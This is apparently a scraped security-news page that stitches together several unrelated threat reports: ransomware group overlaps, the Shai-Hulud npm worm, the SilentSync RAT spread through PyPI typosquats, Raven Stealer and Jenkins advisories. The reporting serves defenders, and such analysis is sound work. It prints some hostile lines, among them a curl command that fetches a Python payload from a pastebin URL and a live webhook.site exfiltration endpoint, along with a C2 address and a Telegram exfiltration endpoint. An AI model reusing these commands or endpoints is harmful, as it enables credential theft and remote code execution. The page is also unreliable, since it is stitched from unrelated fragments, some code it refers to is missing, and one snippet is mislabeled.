Splunk today unveiled a comprehensive guide designed to empower security teams to detect Remote Employment Fraud (REF) during the critical onboarding phase—when imposters have already passed through HR vetting and background checks and gained network access. Building on the inaugural blog, “Imposters at the Gate: Spotting Remote Employment Fraud Before It Crosses the Wire,” this […]
In recent months, cybersecurity researchers have exposed a tangled web of hidden alliances among leading ransomware operations, reshaping how defenders perceive these threats.
Historically treated as distinct entities—Conti, LockBit, Evil Corp, and others—ransomware groups have evolved into a dynamic marketplace where code, infrastructure, and human capital flow freely between operators.
The transformation accelerated after major disruptions such as the Conti takedown in mid-2024, forcing affiliates to scatter and rebrand under new banners.
The result is a fractured ecosystem where attribution based solely on ransomware family names is increasingly unreliable.
Domaintools analysts identified overlapping infrastructure footprints and shared binary artifacts that point to resource pooling rather than isolated criminal factions.
Passive DNS records, shared SSL certificates, and duplicate command-and-control domains revealed that multiple groups have leveraged the same bulletproof hosting providers, suggesting either direct collaboration or common affiliations at the affiliate level.
Analytical map (Source – Domaintools)
These infrastructure overlaps underscore the necessity for defenders to track underlying assets and behaviors instead of surface-level brand labels.
Beyond infrastructure, detailed code analysis has uncovered striking similarities in encryption routines and persistence modules.
A comparative disassembly of the loader stages for both Black Basta and QakBot highlights identical opcode sequences in the memory-resident decryptor, indicating code reuse or direct lineage.
In one instance, the decryption stub found in Black Basta’s initial loader closely mirrors the QakBot routine, differing only by offset values:-
for (int i = 0; i < encryptedSize; i++) {
decrypted[i] = encrypted[i] ^ key[(i + keyOffset) % keyLen];
}
This snippet illustrates how affine key indexing enables polymorphic encryption across multiple malware families, complicating signature-based detection.
Infection Mechanism: Fileless Deployment and Persistence
Delving deeper into the infection mechanism reveals a sophisticated fileless approach designed to evade endpoint defenses.
Attackers first exploit exposed RDP services or phishing vectors to deploy a lightweight PowerShell loader in memory.
Once executed, this loader uses the Windows API’s VirtualAlloc and WriteProcessMemory functions to inject a second-stage payload directly into the explorer.exe process.
A sample persistence tactic involves writing a registry key under HKCU:\Software\Microsoft\Windows\CurrentVersion\Run that executes the loader with base64-encoded parameters at user logon.
Domaintools researchers noted that this in-memory injection not only bypasses traditional AV scans but also leverages legitimate system binaries to blend in with normal operations.
By understanding these hidden alliances and infection tactics, cybersecurity teams can prioritize detection of shared infrastructure and code patterns, enabling more resilient defenses against a threat landscape defined by human-driven modularity and rapid rebranding.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Counter Threat Unit™ (CTU) researchers are tracking a sophisticated threat actor known as Warlock Group, which CTU designates as GOLD SALEM. Since March 2025, the group has compromised enterprise networks and bypassed security solutions to deploy its custom Warlock ransomware. While Microsoft refers to this collective as Storm-2603 and associates it “with moderate confidence to […]
The Russian covert influence network known as CopyCop has significantly expanded its disinformation operations, creating over 200 new fake websites since March 2025 to target audiences in the United States, France, and Canada. Digital fingerprint over the Russian flag symbolizing Russian GRU cyber espionage and influence operations This dramatic escalation represents the largest documented expansion […]
The JavaScript ecosystem experienced one of its most sophisticated and damaging supply chain attacks in September 2025, when a novel self-replicating worm dubbed “Shai-Hulud” compromised over 477 npm packages, marking the first successful automated propagation campaign in the npm registry’s history.
This attack represents a significant evolution in supply chain threats, leveraging both social engineering and technical automation to achieve unprecedented scale and persistence across the open-source software ecosystem.
The Shai-Hulud campaign began with a sophisticated phishing operation targeting npm package maintainers through fake domains spoofing the official npm registry.
Attackers created convincing emails from the fraudulent domain npmjs[.]help, closely mimicking the legitimate npmjs[.]com, and urged maintainers to “update” their multi-factor authentication credentials under threat of account lockout.
Shai-Hulud NPM Supply Chain Attack
This social engineering approach proved devastatingly effective, as it exploited the trust relationship between developers and the npm platform while creating a sense of urgency that bypassed normal security caution.
The attack’s sophistication was further evidenced by Unit 42’s assessment that the threat actors likely leveraged Large Language Models (LLMs) to assist in writing the malicious bash scripts, based on the inclusion of comments and emojis in the code.
This represents a concerning trend in cybercriminal operations, where AI tools are increasingly being weaponized to enhance the quality and effectiveness of malicious code development.
Supply Chain Attack Using “Shai-Hulud” Self-Replicating Malware
The malware’s core innovation lies in its self-replicating mechanism, implemented through the NpmModule.updatePackage function. Unlike traditional supply chain attacks that require manual intervention for each compromised package, Shai-Hulud operates as a true worm, automatically identifying and infecting additional packages maintained by compromised developers.
The propagation process follows a systematic approach: downloading existing package tarballs, modifying package.json files to inject malicious postinstall scripts, embedding the ~3.6MB minified bundle.js payload, repackaging the archives, and republishing them to the npm registry.
This automated approach enabled exponential growth in affected packages, with the malware spreading from an initial handful of compromised packages to over 477 infected packages within approximately 72 hours.
Shai-Hulud NPM Supply Chain Attack Timeline
The worm’s design ensures persistence across the ecosystem by leveraging legitimate maintainer credentials and publishing rights, effectively turning trusted developers into unwitting vectors for malware distribution.
The malware execution begins when users install compromised packages via npm install, triggering the postinstall script that launches the bundle.js payload.
This Webpack-bundled script performs comprehensive system reconnaissance, beginning with environment variable extraction (process.env) to capture sensitive credentials immediately available in the execution context.
The payload then deploys TruffleHog, a legitimate open-source secret scanning tool, using the command trufflehog filesystem . --json --results=verified to systematically scan the local filesystem for over 800 different types of credentials.
The malware demonstrates sophisticated credential validation capabilities, using npm whoami commands to verify the authenticity of discovered npm tokens and access cloud service APIs to confirm the validity of AWS, Google Cloud Platform, and Microsoft Azure credentials.
This validation step ensures that only working credentials are exfiltrated, maximizing the value of stolen data for subsequent malicious activities.
Comprehensive Package Analysis
The attack timeline reveals a rapid escalation that caught the security community off-guard. The earliest confirmed malicious package, airpilot@0.8.8, was published on September 14, 2025, at 18:35:07.600Z UTC.
The campaign gained significant momentum with the compromise of @ctrl/tinycolor@4.1.1, a package with over 2.2 million weekly downloads, which was first reported by security researcher Daniel Pereira on September 15, 2025.
The attack’s scope expanded dramatically on September 16, when security researchers identified compromised packages belonging to enterprise vendors, including multiple CrowdStrike npm packages.
This expansion demonstrated the worm’s ability to breach high-value targets and potentially access enterprise development environments, raising the stakes significantly for affected organizations.
Affected Package Inventory
Package_Name
Compromised_Version
Status
ctrl/tinycolor
Removed
rxnt-authentication
0.0.6
Removed
airpilot
0.8.8 (earliest identified)
Removed
angulartics2
14.1.2
Removed
ctrl/deluge
Removed
ctrl/golang-template
Removed
ctrl/magnet-link
Removed
ctrl/ngx-codemirror
Removed
ctrl/ngx-csv
Removed
ctrl/ngx-emoji-mart
Removed
ctrl/ngx-rightclick
Removed
ctrl/qbittorrent
Removed
ctrl/react-adsense
Removed
ctrl/shared-torrent
Removed
ctrl/torrent-file
Removed
ctrl/transmission
Removed
ctrl/ts-base32
Removed
encounter-playground
0.0.5
Removed
json-rules-engine-simplified
0.2.4, 0.2.1
Removed
koa2-swagger-ui
5.11.2, 5.11.1
Removed
nativescript-community/gesturehandler
Removed
nativescript-community/sentry
Removed
nativescript-community/text
Removed
nativescript-community/ui-collectionview
Removed
nativescript-community/ui-drawer
Removed
nativescript-community/ui-image
Removed
nativescript-community/ui-material-bottomsheet
Removed
nativescript-community/ui-material-core
Removed
nativescript-community/ui-material-core-tabs
Removed
ngx-color
10.0.2
Removed
ngx-toastr
19.0.2
Removed
ngx-trend
8.0.1
Removed
react-complaint-image
0.0.35
Removed
react-jsonschema-form-conditionals
0.3.21
Removed
react-jsonschema-form-extras
1.0.4
Removed
rxnt-healthchecks-nestjs
1.0.5
Removed
rxnt-kue
1.0.7
Removed
swc-plugin-component-annotate
1.9.2
Removed
ts-gaussian
3.0.6
Removed
The complete inventory of affected packages spans multiple maintainer namespaces and includes both popular libraries and specialized tools. Key compromised packages include:
High-Impact Packages:
@ctrl/tinycolor@4.1.1, 4.1.2 – 2.2 million weekly downloads
angulartics2@14.1.2 – Popular Angular analytics library
Various @ctrl namespace packages spanning file management, networking, and media processing
The malware’s selection of targets appears strategic, focusing on packages with high download counts and broad dependency graphs to maximize infection potential.
The inclusion of enterprise vendor packages suggests either sophisticated targeting or opportunistic exploitation of compromised maintainer accounts with access to commercial package repositories.
Indicators of Compromise (IOCs) and Detection Methods
Security teams can identify potential compromises through several file system artifacts. The primary indicator is the presence of malicious bundle.js files with the SHA-256 hash 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09.
However, researchers note that this hash may vary across different campaign iterations, requiring behavioral detection rather than relying solely on static signatures.
Public repositories named “Shai-Hulud” containing credential dumps
Unexpected postinstall script additions to package.json files
The malware communicates with a specific command-and-control infrastructure for data exfiltration. The primary exfiltration endpoint is https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7, which received stolen credentials and system information in JSON format. Network monitoring teams should watch for:
Outbound connections to webhook.site domains
Base64-encoded HTTP POST requests containing credential data
GitHub API abuse for repository creation and workflow injection
TruffleHog binary downloads and filesystem scanning activity
The malware exhibits distinctive behavioral patterns that can aid in detection and incident response. Key process indicators include:
Execution of npm whoami commands for credential validation
Automated npm publish operations from compromised accounts
TruffleHog process execution with filesystem scanning parameters
GitHub API calls for repository enumeration and modification
Credential Harvesting and Data Exfiltration
Shai-Hulud implements a comprehensive credential harvesting strategy targeting multiple credential types and storage locations.
The malware prioritizes high-value credentials, including npm publishing tokens, GitHub Personal Access Tokens (PATs), and cloud service credentials for AWS, Google Cloud Platform, and Microsoft Azure.
The systematic approach includes scanning .npmrc files for npm registry tokens, extracting SSH private keys (id_rsa) from default locations, and parsing Git configuration files (.git/config) for embedded credentials.
The malware also targets environment-specific credential storage, including .env files commonly used in development environments and CI/CD pipeline configurations. This comprehensive approach ensures maximum credential exposure across different development workflows and deployment scenarios.
Critical supply chain attack on npm package @ctrl/tinycolor infecting 40+ packages with self-propagating malware and a critical severity level
The attack employs a dual-channel exfiltration strategy to ensure data persistence and accessibility. Primary exfiltration occurs through webhook endpoints at webhook.site, providing immediate access to stolen credentials via HTTP POST requests containing JSON-encoded credential data.
The secondary exfiltration method involves creating public GitHub repositories named “Shai-Hulud” within compromised accounts, where complete credential dumps are stored as base64-encoded files.
The malware also establishes persistence through GitHub Actions workflows, injecting .github/workflows/shai-hulud-workflow.yml files that execute on code pushes and automatically exfiltrate repository secrets using the toJSON(secrets) function.
This persistence mechanism ensures continued data collection even after the initial infection is removed from development machines.
The compromise of CrowdStrike npm packages represents a significant escalation in the attack’s potential impact on enterprise environments.
While specific package names were rapidly removed by npm administrators and CrowdStrike’s incident response team, the compromise demonstrates the malware’s ability to infiltrate packages belonging to major cybersecurity vendors.
This development raises concerns about supply chain security in enterprise software development and the potential for insider threat scenarios resulting from compromised vendor packages.
CrowdStrike confirmed that they acted quickly to remove the compromised packages upon discovery, but the incident highlights the challenges faced by enterprise software vendors in maintaining supply chain integrity.
The compromise also underscores the importance of comprehensive dependency scanning and package integrity verification in enterprise development workflows.
Security researchers have identified significant operational and technical overlaps between Shai-Hulud and previous npm supply chain attacks, particularly the S1ngularity/Nx compromise that occurred in late August 2025.
Both campaigns share similar credential harvesting techniques, GitHub repository manipulation methods, and a preference for creating public repositories to store stolen data. The technical similarities suggest either the same threat actor group or shared tooling and methodologies between related groups.
The progression from the S1ngularity attack to Shai-Hulud demonstrates a clear evolution in attacker capabilities, with the addition of self-propagating worm functionality representing a significant advancement in automated supply chain exploitation.
This evolution suggests that threat actors are continuously refining their techniques and investing in more sophisticated attack infrastructure.
Lessons Learned and Future Implications
The Shai-Hulud attack represents a watershed moment in supply chain security, demonstrating how traditional security measures are inadequate against self-propagating threats that operate at CI/CD speed.
The attack’s success highlights the need for fundamental changes in how organizations approach dependency management and package validation.
Traditional approaches that focus on static vulnerability scanning and known-bad package identification are insufficient against dynamic, self-modifying threats that leverage legitimate credentials and publishing infrastructure.
The attack also underscores the critical importance of maintainer account security, as compromise of a single high-privilege account can cascade across entire package ecosystems.
The Shai-Hulud npm supply chain attack represents a paradigm shift in supply chain threats, combining sophisticated social engineering with automated propagation mechanisms to achieve unprecedented scale and impact.
The attack’s success in compromising over 477 packages within a three-day period demonstrates the vulnerability of trust-based ecosystems to well-executed adversarial operations.
The incident’s lessons extend beyond immediate technical remediations to fundamental questions about ecosystem security architecture and the balance between accessibility and security in open-source software distribution.
As the JavaScript ecosystem continues to grow and enterprises increase their reliance on npm packages, the security implications of Shai-Hulud will influence supply chain security practices for years to come.
The attack has proven that traditional security approaches are inadequate against adaptive, self-propagating threats, necessitating new approaches that combine automated detection, community collaboration, and enhanced maintainer security practices.
Future supply chain security must evolve to address not just known threats, but the innovative attack methodologies that sophisticated adversaries continue to develop.
The npm ecosystem’s recovery from Shai-Hulud has demonstrated both its resilience and its vulnerabilities, providing a critical learning opportunity for improving supply chain security across all software distribution platforms.
The lessons learned from this incident must inform not only technical security improvements but also policy changes, community practices, and organizational security strategies to better defend against the next generation of supply chain attacks.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Python developers face a growing threat from typosquatted packages in the Python Package Index (PyPI), with malicious actors increasingly targeting this trusted repository to distribute sophisticated malware.
Recent discoveries have exposed a concerning trend where threat actors create packages that closely mimic legitimate libraries, using slight spelling variations to trick unsuspecting developers into installing harmful code.
In July 2025, security researchers began tracking a series of malicious Python packages that employ this deceptive technique.
The initial discovery of a package named termncolor marked the beginning of what would become a broader campaign targeting the Python development community.
These packages demonstrate how supply chain attacks have evolved to exploit the trust developers place in open-source repositories.
The threat escalated significantly in early August 2025, when Zscaler analysts identified two additional malicious Python packages named sisaws and secmeasure.
Both packages were traced to the same author and delivered a newly discovered Remote Access Trojan dubbed SilentSync.
The sisaws package specifically leverages typosquatting against the legitimate sisa package, which provides integration capabilities for Argentina’s national health information system, Sistema Integrado de Información Sanitaria Argentino.
These malicious packages showcase sophisticated social engineering techniques, carefully mimicking the functionality and appearance of their legitimate counterparts.
Attack chain (Source – Zscaler)
The threat actors demonstrated remarkable attention to detail, ensuring their packages would pass casual inspection while hiding dangerous payload delivery mechanisms within seemingly benign initialization functions.
The SilentSync RAT represents a significant advancement in Python-based malware, incorporating cross-platform persistence mechanisms, comprehensive data exfiltration capabilities, and sophisticated command-and-control communication protocols.
Currently targeting Windows systems through the malicious PyPI packages, SilentSync maintains built-in compatibility for Linux and macOS environments, suggesting potential future expansion of the campaign.
Persistence and Evasion Mechanisms
SilentSync employs platform-specific persistence techniques that demonstrate the malware’s sophisticated design philosophy.
The RAT implements different approaches depending on the target operating system, ensuring sustained access regardless of the victim’s environment.
On Windows systems, SilentSync establishes persistence by creating a registry entry under the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key with the name PyHelper, automatically launching the malicious script during system startup.
The malware’s Linux persistence mechanism involves modifying the victim’s crontab configuration file, inserting an @reboot directive that executes the payload whenever the system restarts.
For macOS targets, SilentSync generates a property list file named com[.]apple[.]pyhelper[.]plist within the ~ / Library/LaunchAgents directory, registering itself as a launch agent that activates during user login sessions.
SilentSync’s command-and-control infrastructure utilizes HTTP communication with a hardcoded server at IP address 200.58.107.25, which is stored in Base64 encoding and decoded during runtime to evade static analysis.
The malware implements a REST API architecture using TCP port 5000, with specific endpoints for different operational functions including connectivity beacons, command requests, status reporting, and data exfiltration.
# Example of SilentSync's hex decoding mechanism used in the malicious packages
curl - sL https[:]//pastebin[.]com/raw/jaH2uRE1 - o %TEMP%\\helper[.]py
The RAT’s data collection capabilities extend beyond basic file theft to include comprehensive browser data harvesting.
SilentSync specifically targets Chromium-based browsers including Chrome, Edge, and Brave, as well as Firefox, extracting four critical data categories from each profile: browsing history, autofill information, stored cookies, and saved credentials.
After successful exfiltration, the malware systematically removes all traces of its activities from the infected system to minimize detection risks.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
A critical security vulnerability has been discovered in PureVPN’s Linux clients that exposes users’ real IPv6 addresses during network reconnections, undermining the privacy protections that users expect from their VPN service. The vulnerability affects both the graphical user interface (GUI version 2.10.0) and command-line interface (CLI version 2.0.1) on Linux systems, specifically tested on Ubuntu […]
Raven Stealer has emerged as a potent information‐stealing threat targeting users of Chromium‐based browsers, most notably Google Chrome.
First observed in mid-2025, this lightweight malware distinguishes itself through a modular architecture and stealthy design, allowing it to harvest sensitive information without alerting victims.
Delivered predominantly via cracked software bundles and underground forums, Raven Stealer capitalizes on social engineering tactics and repackaged installers to convince users to execute its malicious payload.
Once unleashed on a host system, Raven Stealer begins by probing local storage paths associated with Chrome, Edge, Brave, and similar browsers to locate encryption keys and credential vaults.
It then leverages native Windows API calls to decrypt and extract saved passwords, cookies, autofill entries, and payment data. During this phase, the malware avoids writing any components to disk by executing payload modules directly from its resource section, encrypted using ChaCha20.
This in-memory execution strategy enables Raven Stealer to evade signature-based detection and disk-monitoring defenses.
UI of the stealer (Soirce – Point Wild)
Point Wild analysts identified that the resource‐embedding technique streamlines deployment and complicates forensic analysis, as configuration data and modules are retrieved dynamically at runtime.
After initial credential harvesting, Raven Stealer compiles the stolen artifacts into plain text files within the user’s AppData directory, organized under a folder named “RavenStealer.”
The resulting files—cookies.txt, passwords.txt, and payments.txt—are then prepared for exfiltration.
Data transmission is carried out via Telegram’s Bot API: Raven Stealer embeds a user-supplied Bot Token and Chat ID into its payload, which it retrieves from its own resource configuration.
This integration offers attackers a familiar command-and-control channel while bypassing many corporate network filters.
Despite its reliance on Telegram, the malware maintains resilience against token expiration by prompting the builder UI to accept new credentials upon each payload generation.
Infection Mechanism Deep Dive
Raven Stealer’s infection mechanism hinges on reflective process hollowing to inject its main DLL payload into a suspended Chrome process.
Execution Flow (Soirce – Point Wild)
Upon execution, the malware locates the Chrome binary path and launches a new instance in a suspended state:-
Point Wild analysts noted that the payload uses ChaCha20 decryption in memory to reconstruct the DLL before execution.
After writing the decrypted payload into the allocated memory, the malware adjusts thread context to point to the remote buffer and resumes the thread:
This approach masks malicious activity under the guise of a legitimate Chrome process, reducing detection likelihood.
Once injected, the DLL enumerates browser profiles, decrypts stored credentials using the AES key found in Chrome’s Local State file, and writes the cleartext data to disk.
Finally, the compiled archive RavenStealer.zip is sent to the attacker’s Telegram channel via the endpoint https://api.telegram.org/bot<token>/sendDocument.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Jenkins has released critical updates addressing four security flaws that unauthenticated and low-privileged attackers could exploit to disrupt service or glean sensitive configuration details.
Administrators running Jenkins weekly releases up to 2.527 or the Long-Term Support (LTS) stream up to 2.516.2 must upgrade to mitigate these risks.
HTTP/2 Denial of Service (CVE-2025-5115)
A high-severity issue (CVSS 3.1 A:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) exists in the Winstone-Jetty HTTP/2 implementation bundled with Jenkins core. When Jenkins is launched via an equivalent systemd service configuration, the outdated Jetty version is vulnerable to a denial of service attack known as “MadeYouReset.”
Unauthenticated attackers can trigger unchecked HTTP/2 frames to exhaust server resources, causing Jenkins to crash.
This flaw affects Jenkins 2.523 and earlier, and LTS 2.516.2 and earlier when HTTP/2 is enabled. HTTP/2 remains disabled by default in native installers and official Docker images, reads the advisory.
The fixes in Jenkins 2.524 and LTS 2.516.3 update Jetty to version 12.0.25, removing the vulnerability. Administrators unable to upgrade immediately are strongly advised to disable HTTP/2 support.
Two medium-severity flaws allow unauthorized enumeration of internal components. In the sidepanel executors widget, Jenkins 2.527 and earlier (LTS 2.516.2 and earlier) fail to enforce Overall/Read permission, letting unauthenticated users list agent names (CVE-2025-59474).
Similarly, a bug in the authenticated user profile dropdown (CVE-2025-59475) permits attackers with minimal privileges to discover which plugins, such as the Credentials Plugin, are installed by inspecting menu entries.
Both issues are resolved in Jenkins weekly 2.528 and LTS 2.516.3, which remove the vulnerable sidepanel and enforce permission checks in profile menus.
Log Message Injection (CVE-2025-59476)
Jenkins’ console log formatter in versions up to 2.527 (LTS 2.516.2 and earlier) does not sanitize user-controlled content before writing to system logs (jenkins.log and equivalents).
Attackers can insert carriage return or line feed characters or even Unicode “Trojan Source” codepoints—into log entries, forging misleading log lines that hamper incident response.
The update in weekly 2.528 and LTS 2.516.3 prefixes injected lines with indicators like [CR], [LF], or [CRLF] >, but administrators are still advised to use log viewers that highlight unusual characters and restrict log access to trusted personnel.
Missing permission check in authenticated users’ profile menu
4.6
Medium
CVE-2025-59476
Log message injection vulnerability
4.4
Medium
Mitigations
All Jenkins users should upgrade immediately: weekly releases to 2.528 and LTS to 2.516.3.
These versions collectively address the high-severity HTTP/2 DoS (CVE-2025-5115) and the medium-severity permission-check and log injection flaws (CVE-2025-59474; CVE-2025-59475; CVE-2025-59476).
The security researchers Daniel Beck (CloudBees, Inc.), Manuel Fernandez (Stackhopper Security), and IBM Cloud Red Team members Robert Houtenbrink, Faris Mohammed, and Harsh Yadav reported these issues.
Administrators unable to upgrade should, at a minimum, disable HTTP/2 and restrict access to log files to prevent exploitation.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Researchers have uncovered a zero-day vulnerability in TP-Link routers that allows attackers to bypass Address Space Layout Randomization (ASLR) and execute arbitrary code remotely. Tracked as CVE-2025-9961, this flaw resides in the CWMP (TR-069) binary and can be triggered through malformed SOAP requests, granting full control of affected devices. A detailed technical walkthrough of discovery, […]
.webp)
.webp)
.webp)
.webp)
